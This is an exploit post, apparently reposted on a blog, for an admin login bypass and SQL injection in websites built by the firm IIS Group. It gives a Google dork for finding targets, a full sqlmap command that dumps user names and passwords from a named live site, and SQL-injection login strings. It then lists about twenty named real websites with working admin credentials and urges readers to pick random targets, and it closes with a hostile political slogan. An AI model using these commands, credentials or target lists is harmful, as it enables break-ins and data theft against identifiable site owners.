# Exploit Title: IIS Group Admin Panel Bypass And Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"Powered by IIS Group"
# Tested on : Kali Linux 2017 Chrome, Firefox
# Date : 20.12.2017
# Vendor Home: http://www.iisgroup.co.za/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup ################################################################################# Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target [+] /admin/
[+] /admin/login.asp
[+] Sql GET parameter 'cat' is vulnerable
Video: https://youtu.be/YhGVu5wTtrQ
Command:root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only --no-cast -u "http://www.deville.co.za/products.asp?cat=35" -T users -C id,name,pw --dump
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=35 AND 8346=8346
Demo: Sql:
http://www.deville.co.za/products.asp?cat=35'===> admin dv147
http://www.adval.co.za/online.asp?controller=news&view=all&id=1'
http://www.iisgroup.co.za/admin/login.asp?error=1' ===>
http://www.mactool.co.za/admin/login.asp ===> '=''or'
http://superfloral.info/admin/login.asp ===> '=''OR'
Username: admin
Password: admin
Username: '=''or'
Password: '=''or'
http://absolutecars.co.za/admin/online.asp ===> admin admin
http://www.thehosevan.co.za/admin/online.asp ===> admin admin
http://www.fluidco.co.za/admin/online.asp ===> admin admin
http://www.burma.co.za/cms/index.php ===> admin admin
http://farsa.biz/admin/login.asp ===> admin admin
http://fundisa-academy.com/admin/online.asp ===> admin admin
http://efpglobal.com/admin/online.asp ===> admin admin
http://biscuitmanufacturers.co.za/admin/login.asp ===> admin admin
http://www.fluidco.co.za/admin/online.asp ===> admin admin
http://www.360businessparks.com/admin/online.asp ===> admin admin http://www.360storagesolutions.co.za/admin/online.asp ===> admin admin http://www.thehosevan.co.za/admin/online.asp ===> admin admin
http://viewdns.info/reverseip/?host=196.44.35.90&t=1 Choose Random Target
FREE PALESTINE & FREE GAZA ===> İSREAL TERRORIST #KUDUS İSLAMİNDİR!
Next
« Prev Post
« Prev Post
Previous
Next Post »
Next Post »
Subscribe to:
Post Comments (Atom)
0 Komentar